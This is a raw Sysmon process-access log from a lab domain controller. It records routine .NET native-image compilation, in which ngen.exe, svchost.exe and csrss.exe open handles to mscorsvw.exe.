13:50:17.337{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D703-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.290{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D603-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D603-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D603-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D503-00000000A301}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.212{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D503-00000000A301}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.212{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D503-00000000A301}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.150{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D403-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.134{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D403-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.134{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D403-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.087{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D303-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.072{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D303-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D303-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.556{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.540{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.540{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.415{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E203-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.400{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E203-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.400{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E203-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E103-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.337{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E103-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.337{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E103-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
